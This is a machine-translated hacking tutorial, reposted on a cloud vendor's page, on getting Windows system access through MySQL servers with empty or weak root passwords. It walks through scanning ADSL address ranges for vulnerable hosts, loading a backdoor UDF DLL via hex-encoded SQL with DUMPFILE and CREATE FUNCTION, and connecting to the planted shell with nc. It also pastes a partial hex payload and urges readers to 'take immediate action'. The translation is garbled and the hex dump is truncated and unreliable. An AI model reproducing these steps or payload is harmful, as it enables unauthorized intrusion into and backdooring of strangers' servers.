Practice of obtaining windows system permissions with weak mysql passwords

Last Update:2013-11-29 Source: Internet

Author: User

Developer on Alibaba Coud: Build your first app with APIs, SDKs, and tutorials on the Alibaba Cloud. Read more ＞

Author: pingping Source: Xiaorong Forum

On April 9, May this year, mix published an article on mysql intrusion at the phantom Forum (<
Run the system command>, connect to the address http://www.ph4nt0m.org/bbs/showthread.php? Threadid = 33006 ).

Later, the hacker experienced a demonstration and animation, but the usage of mysql.txt was not published, resulting in many unfamiliar mysql

People cannot intrude into mysql.
In fact, the execution of arbitrary commands by registering a self-written Function in the udf dll of mysql has been published as early as last December. Refer to the article.

Http://www.ph4nt0m.org/bbs/showthread.php? S = & threadid = 33331; while mix achieves direct transfer of 2 from mysql client

The System File entered the server hard disk, so it was an amazing discovery! Let me talk about my intrusion practices!

1. Enable hscan1.2 to scan for an ip address segment. We recommend that you scan the ip address segment where adsl is located, because the ip address owner of these segments has poor security meaning.

The root password of a large number of mysql instances is empty and has the permission to access the default mysql database.
2. Install mysql for windows on your machine.

Http://download.pchome.net/internet/server/dbserver/2506.html
3. Download my_udf.dll or mix. dll from the Phantom Forum (I prefer my_udf.dll, because mix. dll will cause mysql false.

Dead ).
4. Run winhex, open my_udf.dll, click copy all under the edit menu and select hex values. Open notepad and click paste.

Copy the hexadecimal my_udf.dll!
5. Open another notepad and write the following statement:
Use mysql;
Set @ a = concat (, 0x ...)
Create table Mix (data LONGBLOB );
Insert into Mix values (""); update Mix set data = @;
Select data from Mix into DUMPFILE c: \ my_udf.dll;
Create function my_udfdoor returns string soname c: \ my_udf.dll;
Select my_udfdoor ();
6. Copy the hexadecimal data on the notepad in step 4 and replace the "..." in the second line of the statement in step 2, and save it to the c root.

In the directory, the name is mysql.txt.
7. Open a local DOS command window, jump to the mysql installation directory, and enter mysql-h218.1.1.1-uroot-p123
(Note: replace 218.1.1.1, root, and 123 with the ip address, username, and password values scanned by hscan. If

If the value is null, the-p parameter is not required );
8. If the remote mysql server is successfully connected in step 1, enter. c: mysql.txt and press Enter. If the remote mysql server is

If your mysql account is running in windows and has high permissions, you will be successfully installed on the remote server.

Backdoor.
9. Finally, use nc to connect to port 3306 of the server, enter the password fuck, and press Enter. If the shell does not come out, repeat it several times.

Car. If you still don't need a shell, try another target.

Next I paste the content of mysql.txt on my machine, so that everyone can take immediate action! However, the backdoor password is not fuck. I changed it to ping.

Welcome to visit my website http://www.hackercradle.com/.my QQ Group 2762695, 9207339welcome! ---------

----------------------------------------------------------------------------------
Use mysql;
Set @ a = concat (,
0x4d5a90000300000004000000ffff0000b80000000000000040000000000000000000000000000000000000

Bytes

010400deb188420000000000000000e0000e210b010600004000000030000000000000b91500000000000005000

00000000100010000000100000040000000100000004000000000000000080000000100000000000000200000000

00100000000000000100000000000000000000000000000d05a000048000000b0550000500000000000000000

00000000000000000000000000000000000070000094040000000000000000000000000000000000000000000000

Please refer to the following link for more information:

20171000000000000000000000000002e74657874000000f4350000000000000400000000000000000000000000

000000200000602e00004617460000180b00000050000000000000000000000000000000000000000000000000400000

402e6461746000000e00f00000060000000000000060000000000000000000000000000000000000400000c02e000056c6f

6300002a0b00000070000000000000070000000000000000000000000000000000000400000420000000000000000000000

00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000

00000

This article is an English version of an article which is originally in the Chinese language on aliyun.com and is provided for information purposes only. This website makes no representation or warranty of any kind, either expressed or implied, as to the accuracy, completeness ownership or reliability of the article or any translations thereof. If you have any concerns or complaints relating to the article, please send an email, providing a detailed description of the concern or complaint, to info-contact@alibabacloud.com. A staff member will contact you within 5 working days. Once verified, infringing content will be removed immediately.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

Get Started for Free

Sales Support

1 on 1 presale consultation

Chat Contact Sales
After-Sales Support

24/7 Technical Support 6 Free Tickets per Quarter Faster Response

Open a Ticket
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.

Learn More

Practice of obtaining windows system permissions with weak mysql passwords

Contact Us

What's Trending

Top 10 Tags

Top 10 Keywords

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support

Practice of obtaining windows system permissions with weak mysql passwords

Contact Us

What's Trending

Top 10 Tags

Top 10 Keywords

Trending Topic

A Free Trial That Lets You Build Big!

Sales Support

After-Sales Support